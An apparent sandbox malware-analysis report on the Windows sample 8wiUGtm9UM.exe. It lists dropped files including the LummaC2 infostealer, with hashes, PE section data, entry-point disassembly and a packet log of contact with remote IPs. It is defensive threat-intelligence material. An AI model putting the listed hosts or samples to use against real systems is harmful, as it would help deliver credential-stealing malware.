	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	xd.mips.elf	Get hash	malicious	Mirai	Browse	34.206.168.77
	xd.x86.elf	Get hash	malicious	Mirai	Browse	44.213.56.197

Process:	C:\Users\user\Desktop\8wiUGtm9UM.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\LummaC2.exe

Download File

Process:	C:\Users\user\Desktop\8wiUGtm9UM.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	299520
Entropy (8bit):	6.860310132420335
Encrypted:	false
SSDEEP:	6144:R5s/zt4HV88/rCatOZFABeDUbLv0uC8r9qMq2E9ND43F+ZnSi4:8rtsVPrNMG9qwENs8ZJ4
MD5:	607000C61FCB5A41B8D511B5ED7625D4
SHA1:	DFAA2BFEA8A51B14AC089BB6A39F037E769169D1
SHA-256:	C9831759E15B3A52238C03D0D51DB9DE0C1A6C7A61A51DE72C5869061172E9DB
SHA-512:	64940F02635CCBC2DCD42449C0C435A6A50BD00FA93D6E2E161371CDC766103EF858CCBAAE4497A75576121EA7BC25BA54A9064748F9D6676989A4C9F8B50E58
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...xZig............................ .............@..........................P............@.....................................................................(9...................................................................................text............................... ..`.rdata... ......."..................@..@.data...L....0...P..................@....reloc..(9.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Set-up.exe

Download File

Process:	C:\Users\user\Desktop\8wiUGtm9UM.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6851208
Entropy (8bit):	6.451509958428788
Encrypted:	false
SSDEEP:	98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
MD5:	2A99036C44C996CEDEB2042D389FE23C
SHA1:	4F1E624BCC030E44722DE26B72C8156BF57E14E8
SHA-256:	73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
SHA-512:	6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.98351548354601
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	8wiUGtm9UM.exe
File size:	6'156'288 bytes
MD5:	a99adad8a9f9f1d9dcce30c42dd4be3a
SHA1:	62a01c957ca7d637a1d8090475c4ef2843100bb8
SHA256:	1ad8785caeb519b67ea168477437d8166d9747196a46d22313f48eb4ab86fec8
SHA512:	ef4d785015f24cdf4339e9ab0ce8f824456e3b60d9d605fedaeec2403797b4490949bebb248cc076d1fa3d031f82eb86d517bc1cdb4e009e413433d84a29b20c
SSDEEP:	98304:Xez8a1mzYrkxZ8VYKOwErakov9RUxHJTjrhrpLpMOz8C+kj36YtKonKG6Lq7zzYf:Xez12Yo38VLEraBA3nhLMOJ+I3NtKonr
TLSH:	775633181DE03F4BC3A7053E48B6973F9889863455241FDE1ADBA27B94349839326E7F
File Content Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg.................<m..........`... ...`m...@.. ..............................`.^...@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xf16000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676D92AB [Thu Dec 26 17:30:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FA790B1794Ah
bswap esi
pop ebp
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
add al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi+00000080h], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi-80h], bh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop edi
add al, 00h
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
lahf
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6d8055	0x69	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6d6000	0x53c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6d81f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x6d4000	0x43d600	8b684fdf92e63d7d296c1bc80f420b2d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6d6000	0x53c	0x400	b78c7e6891201dcd7d397564badf841d	False	0.689453125	data	5.692963396138159	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6d8000	0x2000	0x200	6e9890d240b48e1a4145e7c2679977e3	False	0.150390625	data	1.0043697745670233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6da000	0x29c000	0x200	ab22eac85c1bc14ebacfade268bf6310	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lfpzggwa	0x976000	0x19e000	0x19cc00	e464115c9c3018189b121ab525fa1ae1	False	0.99458838866596	data	7.953387010367614	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ncmmphhn	0xb14000	0x2000	0x400	c94921ce66416c720fcd46fc4ab803ec	False	0.7802734375	data	6.101781730715785	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xb16000	0x4000	0x2200	b18a307c628bd767beb628d8ff4ba8aa	False	0.06560202205882353	DOS executable (COM)	0.7583129061616042	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb125a0	0x244	data			0.4689655172413793
RT_MANIFEST	0xb127e4	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:40:30.722055912 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 08:40:30.722098112 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 08:40:30.722202063 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 08:40:30.725754976 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 08:40:30.725769043 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 08:40:32.526294947 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 08:40:32.530256987 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 08:40:32.530286074 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 08:40:32.532059908 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 08:40:32.532140017 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 08:40:32.546164989 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 08:40:32.546303034 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 08:40:32.572204113 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 08:40:32.572225094 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 08:40:32.616283894 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 08:40:32.901663065 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 08:40:32.901797056 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 08:40:32.901875973 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 08:40:32.902811050 CET	49704	443	192.168.2.5	34.226.108.155
Dec 27, 2024 08:40:32.902832985 CET	443	49704	34.226.108.155	192.168.2.5
Dec 27, 2024 08:40:44.786211014 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:44.905635118 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:44.905750990 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:44.906758070 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.026779890 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.026818037 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.026937962 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.026962042 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.026968002 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.027034998 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.027050972 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.027137041 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.027142048 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.027152061 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.027184010 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.027235985 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.027297974 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.027302980 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.027373075 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.146805048 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.146840096 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.146979094 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.147027969 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.147030115 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.147062063 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.147157907 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.147161961 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.147186995 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.147243023 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.191392899 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.191728115 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.307346106 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.307461977 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.355335951 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.467319965 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.467370987 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.667340994 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.667432070 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.907352924 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.907500982 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.926645994 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:45.926837921 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:45.926922083 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:46.256872892 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:46.944355011 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:46.951286077 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:46.951405048 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.071419001 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.071777105 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.071789980 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.071799994 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.071810961 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.071867943 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.071904898 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.189486980 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.189546108 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.189606905 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.189609051 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.189620972 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.189661980 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.189707041 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.189721107 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.189739943 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.189778090 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.189825058 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.189850092 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.189878941 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.189904928 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.189965963 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.189975977 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.190017939 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.190021992 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.190057993 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.190063953 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.190100908 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.190104961 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.190155029 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.309195042 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.309212923 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.309335947 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.309345961 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.309377909 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.309416056 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.309576035 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.309585094 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.309748888 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.309758902 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.309855938 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.309865952 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310008049 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310039043 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310184956 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310235977 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310278893 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310298920 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310432911 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310444117 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310605049 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310602903 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.310616970 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310684919 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.310725927 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310735941 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310787916 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.310841084 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310879946 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310929060 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.310952902 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.310981035 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.311007977 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.311036110 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.311182976 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.311192989 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.311237097 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.311270952 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.311290026 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.311341047 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.311564922 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.311588049 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.311615944 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.311634064 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.432372093 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.435863018 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.436141014 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.436151981 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.436235905 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.437397957 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.437482119 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.437572002 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.437622070 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.437690020 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.437699080 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.437717915 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.437730074 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.437745094 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.437787056 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.437832117 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.437882900 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.437889099 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.437939882 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.438446999 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.438456059 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.438493967 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.438507080 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.438507080 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.438519001 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.438553095 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.438565969 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.438612938 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.438623905 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.438671112 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.438740969 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.438754082 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.438796997 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.438852072 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.438910007 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.438949108 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.438991070 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439019918 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.439081907 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439136982 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.439189911 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439212084 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.439248085 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.439260960 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439291954 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.439297915 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439342022 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439371109 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.439421892 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439431906 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.439479113 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.439481020 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439527988 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439548016 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.439568996 CET	80	49721	185.121.15.192	192.168.2.5
Dec 27, 2024 08:40:47.439598083 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439615011 CET	49721	80	192.168.2.5	185.121.15.192
Dec 27, 2024 08:40:47.439759016 CET	80	49721	185.121.15.192	192.168.2.5
